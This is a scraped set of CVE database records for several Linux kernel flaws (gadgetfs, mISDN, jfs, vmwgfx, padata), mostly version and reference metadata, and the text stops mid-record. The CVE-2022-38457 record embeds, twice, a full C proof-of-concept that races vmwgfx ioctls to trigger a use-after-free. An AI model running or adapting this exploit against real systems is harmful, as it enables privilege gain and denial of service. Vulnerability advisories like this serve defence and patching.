"orgId": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
"shortName": "CISA-ADP"
},
"title": "CISA ADP Vulnrichment"
}
],
"cna": {
"affected": [
{
"product": "Linux kernel",
"vendor": "n/a",
"versions": [
{
"status": "affected",
"version": "unknown"
}
]
}
],
"descriptions": [
{
"lang": "en",
"value": "A use-after-free flaw caused by a race among the superblock operations in the gadgetfs Linux driver was found. It could be triggered by yanking out a device that is running the gadgetfs side."
}
],
"problemTypes": [
{
"descriptions": [
{
"cweId": "CWE-416",
"description": "CWE-416",
"lang": "en",
"type": "CWE"
}
]
}
],
"providerMetadata": {
"dateUpdated": "2023-01-10T00:00:00.000Z",
"orgId": "53f830b8-0a3f-465b-8143-3b8a9948e749",
"shortName": "redhat"
},
"references": [
{
"url": "https://www.openwall.com/lists/oss-security/2022/12/14/5"
}
]
}
},
"cveMetadata": {
"assignerOrgId": "53f830b8-0a3f-465b-8143-3b8a9948e749",
"assignerShortName": "redhat",
"cveId": "CVE-2022-4382",
"datePublished": "2023-01-10T00:00:00.000Z",
"dateReserved": "2022-12-09T00:00:00.000Z",
"dateUpdated": "2025-04-09T15:34:11.631Z",
"state": "PUBLISHED"
},
"dataType": "CVE_RECORD",
"dataVersion": "5.1"
}
CVE-2024-42280 (GCVE-0-2024-42280)
Vulnerability from cvelistv5
Published
2024-08-17 09:08
Modified
2025-05-04 09:25
Severity ?
VLAI Severity ?
EPSS score ?
Summary
In the Linux kernel, the following vulnerability has been resolved:
mISDN: Fix a use after free in hfcmulti_tx()
Don't dereference *sp after calling dev_kfree_skb(*sp).
References
| URL | Tags | |||||||||||||||||||||||||
|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
|
||||||||||||||||||||||||||
Impacted products
| Vendor | Product | Version | ||
|---|---|---|---|---|
| Linux | Linux |
Version: af69fb3a8ffa37e986db00ed93099dc44babeef4 Version: af69fb3a8ffa37e986db00ed93099dc44babeef4 Version: af69fb3a8ffa37e986db00ed93099dc44babeef4 Version: af69fb3a8ffa37e986db00ed93099dc44babeef4 Version: af69fb3a8ffa37e986db00ed93099dc44babeef4 Version: af69fb3a8ffa37e986db00ed93099dc44babeef4 Version: af69fb3a8ffa37e986db00ed93099dc44babeef4 Version: af69fb3a8ffa37e986db00ed93099dc44babeef4 |
||
{
"containers": {
"adp": [
{
"metrics": [
{
"other": {
"content": {
"id": "CVE-2024-42280",
"options": [
{
"Exploitation": "none"
},
{
"Automatable": "no"
},
{
"Technical Impact": "partial"
}
],
"role": "CISA Coordinator",
"timestamp": "2024-09-10T16:11:39.682152Z",
"version": "2.0.3"
},
"type": "ssvc"
}
}
],
"providerMetadata": {
"dateUpdated": "2024-09-12T17:33:31.049Z",
"orgId": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
"shortName": "CISA-ADP"
},
"title": "CISA ADP Vulnrichment"
}
],
"cna": {
"affected": [
{
"defaultStatus": "unaffected",
"product": "Linux",
"programFiles": [
"drivers/isdn/hardware/mISDN/hfcmulti.c"
],
"repo": "https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git",
"vendor": "Linux",
"versions": [
{
"lessThan": "70db2c84631f50e02e6b32b543700699dd395803",
"status": "affected",
"version": "af69fb3a8ffa37e986db00ed93099dc44babeef4",
"versionType": "git"
},
{
"lessThan": "d3e4d4a98c5629ccdcb762a0ff6c82ba9738a0c3",
"status": "affected",
"version": "af69fb3a8ffa37e986db00ed93099dc44babeef4",
"versionType": "git"
},
{
"lessThan": "9460ac3dd1ae033bc2b021a458fb535a0c36ddb2",
"status": "affected",
"version": "af69fb3a8ffa37e986db00ed93099dc44babeef4",
"versionType": "git"
},
{
"lessThan": "8f4030277dfb9dbe04fd78566b19931097c9d629",
"status": "affected",
"version": "af69fb3a8ffa37e986db00ed93099dc44babeef4",
"versionType": "git"
},
{
"lessThan": "4d8b642985ae24f4b3656438eb8489834a17bb80",
"status": "affected",
"version": "af69fb3a8ffa37e986db00ed93099dc44babeef4",
"versionType": "git"
},
{
"lessThan": "ddc79556641ee070d36be0de4a1f0a16a71f1fc7",
"status": "affected",
"version": "af69fb3a8ffa37e986db00ed93099dc44babeef4",
"versionType": "git"
},
{
"lessThan": "7e4a539bca7d8d20f2c5d93c18cce8ef77cd78e0",
"status": "affected",
"version": "af69fb3a8ffa37e986db00ed93099dc44babeef4",
"versionType": "git"
},
{
"lessThan": "61ab751451f5ebd0b98e02276a44e23a10110402",
"status": "affected",
"version": "af69fb3a8ffa37e986db00ed93099dc44babeef4",
"versionType": "git"
}
]
},
{
"defaultStatus": "affected",
"product": "Linux",
"programFiles": [
"drivers/isdn/hardware/mISDN/hfcmulti.c"
],
"repo": "https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git",
"vendor": "Linux",
"versions": [
{
"status": "affected",
"version": "2.6.27"
},
{
"lessThan": "2.6.27",
"status": "unaffected",
"version": "0",
"versionType": "semver"
},
{
"lessThanOrEqual": "4.19.*",
"status": "unaffected",
"version": "4.19.320",
"versionType": "semver"
},
{
"lessThanOrEqual": "5.4.*",
"status": "unaffected",
"version": "5.4.282",
"versionType": "semver"
},
{
"lessThanOrEqual": "5.10.*",
"status": "unaffected",
"version": "5.10.224",
"versionType": "semver"
},
{
"lessThanOrEqual": "5.15.*",
"status": "unaffected",
"version": "5.15.165",
"versionType": "semver"
},
{
"lessThanOrEqual": "6.1.*",
"status": "unaffected",
"version": "6.1.103",
"versionType": "semver"
},
{
"lessThanOrEqual": "6.6.*",
"status": "unaffected",
"version": "6.6.44",
"versionType": "semver"
},
{
"lessThanOrEqual": "6.10.*",
"status": "unaffected",
"version": "6.10.3",
"versionType": "semver"
},
{
"lessThanOrEqual": "*",
"status": "unaffected",
"version": "6.11",
"versionType": "original_commit_for_fix"
}
]
}
],
"cpeApplicability": [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "4.19.320",
"versionStartIncluding": "2.6.27",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "5.4.282",
"versionStartIncluding": "2.6.27",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "5.10.224",
"versionStartIncluding": "2.6.27",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "5.15.165",
"versionStartIncluding": "2.6.27",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.1.103",
"versionStartIncluding": "2.6.27",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.6.44",
"versionStartIncluding": "2.6.27",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.10.3",
"versionStartIncluding": "2.6.27",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.11",
"versionStartIncluding": "2.6.27",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
}
]
}
],
"descriptions": [
{
"lang": "en",
"value": "In the Linux kernel, the following vulnerability has been resolved:\n\nmISDN: Fix a use after free in hfcmulti_tx()\n\nDon\u0027t dereference *sp after calling dev_kfree_skb(*sp)."
}
],
"providerMetadata": {
"dateUpdated": "2025-05-04T09:25:49.902Z",
"orgId": "416baaa9-dc9f-4396-8d5f-8c081fb06d67",
"shortName": "Linux"
},
"references": [
{
"url": "https://git.kernel.org/stable/c/70db2c84631f50e02e6b32b543700699dd395803"
},
{
"url": "https://git.kernel.org/stable/c/d3e4d4a98c5629ccdcb762a0ff6c82ba9738a0c3"
},
{
"url": "https://git.kernel.org/stable/c/9460ac3dd1ae033bc2b021a458fb535a0c36ddb2"
},
{
"url": "https://git.kernel.org/stable/c/8f4030277dfb9dbe04fd78566b19931097c9d629"
},
{
"url": "https://git.kernel.org/stable/c/4d8b642985ae24f4b3656438eb8489834a17bb80"
},
{
"url": "https://git.kernel.org/stable/c/ddc79556641ee070d36be0de4a1f0a16a71f1fc7"
},
{
"url": "https://git.kernel.org/stable/c/7e4a539bca7d8d20f2c5d93c18cce8ef77cd78e0"
},
{
"url": "https://git.kernel.org/stable/c/61ab751451f5ebd0b98e02276a44e23a10110402"
}
],
"title": "mISDN: Fix a use after free in hfcmulti_tx()",
"x_generator": {
"engine": "bippy-1.2.0"
}
}
},
"cveMetadata": {
"assignerOrgId": "416baaa9-dc9f-4396-8d5f-8c081fb06d67",
"assignerShortName": "Linux",
"cveId": "CVE-2024-42280",
"datePublished": "2024-08-17T09:08:47.699Z",
"dateReserved": "2024-07-30T07:40:12.261Z",
"dateUpdated": "2025-05-04T09:25:49.902Z",
"state": "PUBLISHED"
},
"dataType": "CVE_RECORD",
"dataVersion": "5.1"
}
CVE-2024-44938 (GCVE-0-2024-44938)
Vulnerability from cvelistv5
Published
2024-08-26 11:20
Modified
2025-05-21 09:13
Severity ?
VLAI Severity ?
EPSS score ?
Summary
In the Linux kernel, the following vulnerability has been resolved:
jfs: Fix shift-out-of-bounds in dbDiscardAG
When searching for the next smaller log2 block, BLKSTOL2() returned 0,
causing shift exponent -1 to be negative.
This patch fixes the issue by exiting the loop directly when negative
shift is found.
References
| URL | Tags | |||||||||||||||||||
|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
|
||||||||||||||||||||
Impacted products
| Vendor | Product | Version | ||
|---|---|---|---|---|
| Linux | Linux |
Version: b40c2e665cd552eae5fbdbb878bc29a34357668e Version: b40c2e665cd552eae5fbdbb878bc29a34357668e Version: b40c2e665cd552eae5fbdbb878bc29a34357668e Version: b40c2e665cd552eae5fbdbb878bc29a34357668e Version: b40c2e665cd552eae5fbdbb878bc29a34357668e Version: b40c2e665cd552eae5fbdbb878bc29a34357668e |
||
{
"containers": {
"adp": [
{
"metrics": [
{
"other": {
"content": {
"id": "CVE-2024-44938",
"options": [
{
"Exploitation": "none"
},
{
"Automatable": "no"
},
{
"Technical Impact": "partial"
}
],
"role": "CISA Coordinator",
"timestamp": "2024-09-10T15:27:38.649616Z",
"version": "2.0.3"
},
"type": "ssvc"
}
}
],
"providerMetadata": {
"dateUpdated": "2024-09-12T17:32:55.564Z",
"orgId": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
"shortName": "CISA-ADP"
},
"title": "CISA ADP Vulnrichment"
}
],
"cna": {
"affected": [
{
"defaultStatus": "unaffected",
"product": "Linux",
"programFiles": [
"fs/jfs/jfs_dmap.c"
],
"repo": "https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git",
"vendor": "Linux",
"versions": [
{
"lessThan": "bb7c605a754823b86dd74f6537ccb9d38a9dec5a",
"status": "affected",
"version": "b40c2e665cd552eae5fbdbb878bc29a34357668e",
"versionType": "git"
},
{
"lessThan": "4de2c04c3acd5b84f50b0d2f8f09e9b2f42374b9",
"status": "affected",
"version": "b40c2e665cd552eae5fbdbb878bc29a34357668e",
"versionType": "git"
},
{
"lessThan": "bd04a149e3a29e7f71b7956ed41dba34e42d539e",
"status": "affected",
"version": "b40c2e665cd552eae5fbdbb878bc29a34357668e",
"versionType": "git"
},
{
"lessThan": "f650148b43949ca9e37e820804bb6026fff404f3",
"status": "affected",
"version": "b40c2e665cd552eae5fbdbb878bc29a34357668e",
"versionType": "git"
},
{
"lessThan": "234e6ea0855cdb5673d54ecaf7dc5c78f3e84630",
"status": "affected",
"version": "b40c2e665cd552eae5fbdbb878bc29a34357668e",
"versionType": "git"
},
{
"lessThan": "7063b80268e2593e58bee8a8d709c2f3ff93e2f2",
"status": "affected",
"version": "b40c2e665cd552eae5fbdbb878bc29a34357668e",
"versionType": "git"
}
]
},
{
"defaultStatus": "affected",
"product": "Linux",
"programFiles": [
"fs/jfs/jfs_dmap.c"
],
"repo": "https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git",
"vendor": "Linux",
"versions": [
{
"status": "affected",
"version": "3.7"
},
{
"lessThan": "3.7",
"status": "unaffected",
"version": "0",
"versionType": "semver"
},
{
"lessThanOrEqual": "5.10.*",
"status": "unaffected",
"version": "5.10.237",
"versionType": "semver"
},
{
"lessThanOrEqual": "5.15.*",
"status": "unaffected",
"version": "5.15.181",
"versionType": "semver"
},
{
"lessThanOrEqual": "6.1.*",
"status": "unaffected",
"version": "6.1.107",
"versionType": "semver"
},
{
"lessThanOrEqual": "6.6.*",
"status": "unaffected",
"version": "6.6.47",
"versionType": "semver"
},
{
"lessThanOrEqual": "6.10.*",
"status": "unaffected",
"version": "6.10.6",
"versionType": "semver"
},
{
"lessThanOrEqual": "*",
"status": "unaffected",
"version": "6.11",
"versionType": "original_commit_for_fix"
}
]
}
],
"cpeApplicability": [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "5.10.237",
"versionStartIncluding": "3.7",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "5.15.181",
"versionStartIncluding": "3.7",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.1.107",
"versionStartIncluding": "3.7",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.6.47",
"versionStartIncluding": "3.7",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.10.6",
"versionStartIncluding": "3.7",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.11",
"versionStartIncluding": "3.7",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
}
]
}
],
"descriptions": [
{
"lang": "en",
"value": "In the Linux kernel, the following vulnerability has been resolved:\n\njfs: Fix shift-out-of-bounds in dbDiscardAG\n\nWhen searching for the next smaller log2 block, BLKSTOL2() returned 0,\ncausing shift exponent -1 to be negative.\n\nThis patch fixes the issue by exiting the loop directly when negative\nshift is found."
}
],
"providerMetadata": {
"dateUpdated": "2025-05-21T09:13:08.507Z",
"orgId": "416baaa9-dc9f-4396-8d5f-8c081fb06d67",
"shortName": "Linux"
},
"references": [
{
"url": "https://git.kernel.org/stable/c/bb7c605a754823b86dd74f6537ccb9d38a9dec5a"
},
{
"url": "https://git.kernel.org/stable/c/4de2c04c3acd5b84f50b0d2f8f09e9b2f42374b9"
},
{
"url": "https://git.kernel.org/stable/c/bd04a149e3a29e7f71b7956ed41dba34e42d539e"
},
{
"url": "https://git.kernel.org/stable/c/f650148b43949ca9e37e820804bb6026fff404f3"
},
{
"url": "https://git.kernel.org/stable/c/234e6ea0855cdb5673d54ecaf7dc5c78f3e84630"
},
{
"url": "https://git.kernel.org/stable/c/7063b80268e2593e58bee8a8d709c2f3ff93e2f2"
}
],
"title": "jfs: Fix shift-out-of-bounds in dbDiscardAG",
"x_generator": {
"engine": "bippy-1.2.0"
}
}
},
"cveMetadata": {
"assignerOrgId": "416baaa9-dc9f-4396-8d5f-8c081fb06d67",
"assignerShortName": "Linux",
"cveId": "CVE-2024-44938",
"datePublished": "2024-08-26T11:20:43.340Z",
"dateReserved": "2024-08-21T05:34:56.664Z",
"dateUpdated": "2025-05-21T09:13:08.507Z",
"state": "PUBLISHED"
},
"dataType": "CVE_RECORD",
"dataVersion": "5.1"
}
CVE-2022-38457 (GCVE-0-2022-38457)
Vulnerability from cvelistv5
Published
2022-09-09 14:39
Modified
2024-09-17 02:11
Severity ?
VLAI Severity ?
EPSS score ?
CWE
- CWE-416 - Use After Free
Summary
A use-after-free(UAF) vulnerability was found in function 'vmw_cmd_res_check' in drivers/gpu/vmxgfx/vmxgfx_execbuf.c in Linux kernel's vmwgfx driver with device file '/dev/dri/renderD128 (or Dxxx)'. This flaw allows a local attacker with a user account on the system to gain privilege, causing a denial of service(DoS).
References
| URL | Tags | ||||
|---|---|---|---|---|---|
|
|||||
{
"containers": {
"adp": [
{
"providerMetadata": {
"dateUpdated": "2024-08-03T10:54:03.666Z",
"orgId": "af854a3a-2127-422b-91ae-364da2661108",
"shortName": "CVE"
},
"references": [
{
"tags": [
"x_refsource_MISC",
"x_transferred"
],
"url": "https://bugzilla.openanolis.cn/show_bug.cgi?id=2074"
}
],
"title": "CVE Program Container"
}
],
"cna": {
"affected": [
{
"product": "kernel",
"vendor": "Linux",
"versions": [
{
"lessThan": "5.13.0-52*",
"status": "affected",
"version": "v4.20-rc1",
"versionType": "custom"
}
]
}
],
"credits": [
{
"lang": "en",
"value": "Ziming Zhang(ezrakiez@gmail.com) from Ant Group Light-Year Security Lab"
}
],
"datePublic": "2022-09-06T00:00:00",
"descriptions": [
{
"lang": "en",
"value": "A use-after-free(UAF) vulnerability was found in function \u0027vmw_cmd_res_check\u0027 in drivers/gpu/vmxgfx/vmxgfx_execbuf.c in Linux kernel\u0027s vmwgfx driver with device file \u0027/dev/dri/renderD128 (or Dxxx)\u0027. This flaw allows a local attacker with a user account on the system to gain privilege, causing a denial of service(DoS)."
}
],
"exploits": [
{
"lang": "en",
"value": "#include \u003cstdio.h\u003e\n#include \u003cstring.h\u003e\n#include \u003cunistd.h\u003e\n#include \u003cerrno.h\u003e\n\n#include \u003clinux/if_tun.h\u003e\n#include \u003cnet/if.h\u003e\n#include \u003csys/ioctl.h\u003e\n#include \u003csys/types.h\u003e\n#include \u003csys/stat.h\u003e\n#include \u003cfcntl.h\u003e\n#include \u003cpthread.h\u003e\n#include \u003csys/socket.h\u003e\n#include \u003cstring.h\u003e\n#include \u003cunistd.h\u003e\n#include \u003cstdlib.h\u003e\n#include \u003csys/ioctl.h\u003e\n#include \u003cerrno.h\u003e\n#include \u003cstdio.h\u003e\n#include \u003cfcntl.h\u003e\n#include \u003cpthread.h\u003e\n#include \u003cstdio.h\u003e\n#include \u003csys/types.h\u003e\n#include \u003cstdint.h\u003e\n#include \u003cnetinet/ip.h\u003e\n#include \u003csys/resource.h\u003e\n#include \u003csys/syscall.h\u003e\n#include \u003climits.h\u003e\n#include \u003csys/mman.h\u003e\n\n#include \u003clinux/fs.h\u003e\nint sid =0;\nint fd = 0;\nint handle=0;\ntypedef struct mixer\n{\n\tint index;\n\tint fd;\n\tchar *msg;\n}mixer_t;\n\nstruct drm_vmw_surface_create_req {\n\t__u32 flags;\n\t__u32 format;\n\t__u32 mip_levels[6];\n\t__u64 size_addr;\n\t__s32 shareable;\n\t__s32 scanout;\n};\nstruct drm_vmw_execbuf_arg {\n\t__u64 commands;\n\t__u32 command_size;\n\t__u32 throttle_us;\n\t__u64 fence_rep;\n\t__u32 version;\n\t__u32 flags;\n\t__u32 context_handle;\n\t__s32 imported_fence_fd;\n};\nvoid init(){\nif ((fd = open(\"/dev/dri/renderD128\", O_RDWR)) == -1)\n {\n printf(\"open tun failed: %s\\n\", strerror(errno));\n return -1;\n }\n \n}\nvoid poc(int handle,int sid){ \nint cmd[0x1000]={0};\ncmd[0]=1044;\ncmd[1]=0x50;\ncmd[2]=handle;\ncmd[3]=0;\ncmd[5]=sid;\ncmd[6]=0;\ncmd[7]=0;\ncmd[13]=1;\ncmd[12]=0;\ncmd[14]=1;\ncmd[19]=12;\nstruct drm_vmw_execbuf_arg arg={0};\n\targ.commands=cmd;\n\targ.command_size=0x100;\n\targ.version=1; \n if (ioctl(fd, 0x4028644C, \u0026arg) == -1)\n {\n printf(\"poc failed: %s\\n\", strerror(errno));\n return -1;\n }\n\n}\nint alloc_bo(){\n\nint arg[0x10]={0};\narg[0]=0x10000;\nif (ioctl(fd, 0xC0186441, \u0026arg) == -1)\n {\n printf(\"alloc_bo failed: %s\\n\", strerror(errno));\n return -1;\n }\n return arg[2]; \n}\n\nint create_surface(){\nint buf[0x100]={0};\nbuf[0]=64;\nbuf[1]=64;\nbuf[2]=64;\nstruct drm_vmw_surface_create_req arg={0};\narg.flags=0;\narg.format=2;\narg.mip_levels[0]=1;\narg.size_addr=buf;\narg.shareable=0;\narg.scanout=0x10;\n\nif (ioctl(fd, 0xC0306449, \u0026arg) == -1)\n {\n printf(\"create_surface failed: %s\\n\", strerror(errno));\n return -1;\n }\nreturn arg.flags;\n}\n\nvoid destory_surface(int sid){\n\nint arg[0x10]={0};\narg[0]=sid;\nif (ioctl(fd, 0x4008644A, \u0026arg) == -1)\n {\n printf(\"destory_surface failed: %s\\n\", strerror(errno));\n return -1;\n } \n}\nvoid thread1(){\nwhile(1){\nsid = create_surface(); \ndestory_surface(sid); \n}\n}\nvoid thread2(){\nwhile(1){\npoc(handle,sid); \n}\n\n}\n\n\nint main(int ac, char **argv)\n{\n pthread_t tid1,tid2;\n\n \n\ninit();\nhandle=alloc_bo();\n if(pthread_create(\u0026tid1,NULL,thread1,NULL)){\n perror(\"thread_create\");\n }\n\n\t\n if(pthread_create(\u0026tid2,NULL,thread2,NULL)){\n perror(\"thread_create\");\n }\n \n while(1){\n sleep(3);\n \n }\n}"
}
],
"metrics": [
{
"cvssV3_1": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "HIGH",
"baseScore": 6.3,
"baseSeverity": "MEDIUM",
"confidentialityImpact": "NONE",
"integrityImpact": "LOW",
"privilegesRequired": "LOW",
"scope": "UNCHANGED",
"userInteraction": "REQUIRED",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:U/C:N/I:L/A:H",
"version": "3.1"
}
}
],
"problemTypes": [
{
"descriptions": [
{
"cweId": "CWE-416",
"description": "CWE-416 Use After Free",
"lang": "en",
"type": "CWE"
}
]
}
],
"providerMetadata": {
"dateUpdated": "2022-09-09T14:39:51",
"orgId": "cb8f1db9-b4b1-487b-a760-f65c4f368d8e",
"shortName": "Anolis"
},
"references": [
{
"tags": [
"x_refsource_MISC"
],
"url": "https://bugzilla.openanolis.cn/show_bug.cgi?id=2074"
}
],
"source": {
"defect": [
"https://bugzilla.openanolis.cn/show_bug.cgi?id=2074"
],
"discovery": "INTERNAL"
},
"title": "There is an UAF vulnerability in vmwgfx driver",
"x_generator": {
"engine": "Vulnogram 0.0.9"
},
"x_legacyV4Record": {
"CVE_data_meta": {
"AKA": "Anolis",
"ASSIGNER": "security@openanolis.org",
"DATE_PUBLIC": "2022-09-06T07:00:00.000Z",
"ID": "CVE-2022-38457",
"STATE": "PUBLIC",
"TITLE": "There is an UAF vulnerability in vmwgfx driver"
},
"affects": {
"vendor": {
"vendor_data": [
{
"product": {
"product_data": [
{
"product_name": "kernel",
"version": {
"version_data": [
{
"version_affected": "\u003e=",
"version_name": "5.13.0-52",
"version_value": "v4.20-rc1"
}
]
}
}
]
},
"vendor_name": "Linux"
}
]
}
},
"credit": [
{
"lang": "eng",
"value": "Ziming Zhang(ezrakiez@gmail.com) from Ant Group Light-Year Security Lab"
}
],
"data_format": "MITRE",
"data_type": "CVE",
"data_version": "4.0",
"description": {
"description_data": [
{
"lang": "eng",
"value": "A use-after-free(UAF) vulnerability was found in function \u0027vmw_cmd_res_check\u0027 in drivers/gpu/vmxgfx/vmxgfx_execbuf.c in Linux kernel\u0027s vmwgfx driver with device file \u0027/dev/dri/renderD128 (or Dxxx)\u0027. This flaw allows a local attacker with a user account on the system to gain privilege, causing a denial of service(DoS)."
}
]
},
"exploit": [
{
"lang": "en",
"value": "#include \u003cstdio.h\u003e\n#include \u003cstring.h\u003e\n#include \u003cunistd.h\u003e\n#include \u003cerrno.h\u003e\n\n#include \u003clinux/if_tun.h\u003e\n#include \u003cnet/if.h\u003e\n#include \u003csys/ioctl.h\u003e\n#include \u003csys/types.h\u003e\n#include \u003csys/stat.h\u003e\n#include \u003cfcntl.h\u003e\n#include \u003cpthread.h\u003e\n#include \u003csys/socket.h\u003e\n#include \u003cstring.h\u003e\n#include \u003cunistd.h\u003e\n#include \u003cstdlib.h\u003e\n#include \u003csys/ioctl.h\u003e\n#include \u003cerrno.h\u003e\n#include \u003cstdio.h\u003e\n#include \u003cfcntl.h\u003e\n#include \u003cpthread.h\u003e\n#include \u003cstdio.h\u003e\n#include \u003csys/types.h\u003e\n#include \u003cstdint.h\u003e\n#include \u003cnetinet/ip.h\u003e\n#include \u003csys/resource.h\u003e\n#include \u003csys/syscall.h\u003e\n#include \u003climits.h\u003e\n#include \u003csys/mman.h\u003e\n\n#include \u003clinux/fs.h\u003e\nint sid =0;\nint fd = 0;\nint handle=0;\ntypedef struct mixer\n{\n\tint index;\n\tint fd;\n\tchar *msg;\n}mixer_t;\n\nstruct drm_vmw_surface_create_req {\n\t__u32 flags;\n\t__u32 format;\n\t__u32 mip_levels[6];\n\t__u64 size_addr;\n\t__s32 shareable;\n\t__s32 scanout;\n};\nstruct drm_vmw_execbuf_arg {\n\t__u64 commands;\n\t__u32 command_size;\n\t__u32 throttle_us;\n\t__u64 fence_rep;\n\t__u32 version;\n\t__u32 flags;\n\t__u32 context_handle;\n\t__s32 imported_fence_fd;\n};\nvoid init(){\nif ((fd = open(\"/dev/dri/renderD128\", O_RDWR)) == -1)\n {\n printf(\"open tun failed: %s\\n\", strerror(errno));\n return -1;\n }\n \n}\nvoid poc(int handle,int sid){ \nint cmd[0x1000]={0};\ncmd[0]=1044;\ncmd[1]=0x50;\ncmd[2]=handle;\ncmd[3]=0;\ncmd[5]=sid;\ncmd[6]=0;\ncmd[7]=0;\ncmd[13]=1;\ncmd[12]=0;\ncmd[14]=1;\ncmd[19]=12;\nstruct drm_vmw_execbuf_arg arg={0};\n\targ.commands=cmd;\n\targ.command_size=0x100;\n\targ.version=1; \n if (ioctl(fd, 0x4028644C, \u0026arg) == -1)\n {\n printf(\"poc failed: %s\\n\", strerror(errno));\n return -1;\n }\n\n}\nint alloc_bo(){\n\nint arg[0x10]={0};\narg[0]=0x10000;\nif (ioctl(fd, 0xC0186441, \u0026arg) == -1)\n {\n printf(\"alloc_bo failed: %s\\n\", strerror(errno));\n return -1;\n }\n return arg[2]; \n}\n\nint create_surface(){\nint buf[0x100]={0};\nbuf[0]=64;\nbuf[1]=64;\nbuf[2]=64;\nstruct drm_vmw_surface_create_req arg={0};\narg.flags=0;\narg.format=2;\narg.mip_levels[0]=1;\narg.size_addr=buf;\narg.shareable=0;\narg.scanout=0x10;\n\nif (ioctl(fd, 0xC0306449, \u0026arg) == -1)\n {\n printf(\"create_surface failed: %s\\n\", strerror(errno));\n return -1;\n }\nreturn arg.flags;\n}\n\nvoid destory_surface(int sid){\n\nint arg[0x10]={0};\narg[0]=sid;\nif (ioctl(fd, 0x4008644A, \u0026arg) == -1)\n {\n printf(\"destory_surface failed: %s\\n\", strerror(errno));\n return -1;\n } \n}\nvoid thread1(){\nwhile(1){\nsid = create_surface(); \ndestory_surface(sid); \n}\n}\nvoid thread2(){\nwhile(1){\npoc(handle,sid); \n}\n\n}\n\n\nint main(int ac, char **argv)\n{\n pthread_t tid1,tid2;\n\n \n\ninit();\nhandle=alloc_bo();\n if(pthread_create(\u0026tid1,NULL,thread1,NULL)){\n perror(\"thread_create\");\n }\n\n\t\n if(pthread_create(\u0026tid2,NULL,thread2,NULL)){\n perror(\"thread_create\");\n }\n \n while(1){\n sleep(3);\n \n }\n}"
}
],
"generator": {
"engine": "Vulnogram 0.0.9"
},
"impact": {
"cvss": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "HIGH",
"baseScore": 6.3,
"baseSeverity": "MEDIUM",
"confidentialityImpact": "NONE",
"integrityImpact": "LOW",
"privilegesRequired": "LOW",
"scope": "UNCHANGED",
"userInteraction": "REQUIRED",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:U/C:N/I:L/A:H",
"version": "3.1"
}
},
"problemtype": {
"problemtype_data": [
{
"description": [
{
"lang": "eng",
"value": "CWE-416 Use After Free"
}
]
}
]
},
"references": {
"reference_data": [
{
"name": "https://bugzilla.openanolis.cn/show_bug.cgi?id=2074",
"refsource": "MISC",
"url": "https://bugzilla.openanolis.cn/show_bug.cgi?id=2074"
}
]
},
"source": {
"defect": [
"https://bugzilla.openanolis.cn/show_bug.cgi?id=2074"
],
"discovery": "INTERNAL"
}
}
}
},
"cveMetadata": {
"assignerOrgId": "cb8f1db9-b4b1-487b-a760-f65c4f368d8e",
"assignerShortName": "Anolis",
"cveId": "CVE-2022-38457",
"datePublished": "2022-09-09T14:39:51.323409Z",
"dateReserved": "2022-09-07T00:00:00",
"dateUpdated": "2024-09-17T02:11:30.468Z",
"state": "PUBLISHED"
},
"dataType": "CVE_RECORD",
"dataVersion": "5.1"
}
CVE-2023-52854 (GCVE-0-2023-52854)
Vulnerability from cvelistv5
Published
2024-05-21 15:31
Modified
2025-05-04 12:49
Severity ?
VLAI Severity ?
EPSS score ?
Summary
In the Linux kernel, the following vulnerability has been resolved:
padata: Fix refcnt handling in padata_free_shell()
In a high-load arm64 environment, the pcrypt_aead01 test in LTP can lead
to system UAF (Use-After-Free) issues. Due to the lengthy analysis of
the pcrypt_aead01 function call, I'll describe the problem scenario
using a simplified model:
Suppose there's a user of padata named `user_function` that adheres to
the padata requirement of calling `padata_free_shell` after `serial()`
has been invoked, as demonstrated in the following code:
```c
struct request {
struct padata_priv padata;
struct completion *done;
};
void parallel(struct padata_priv *padata) {
do_something();
}
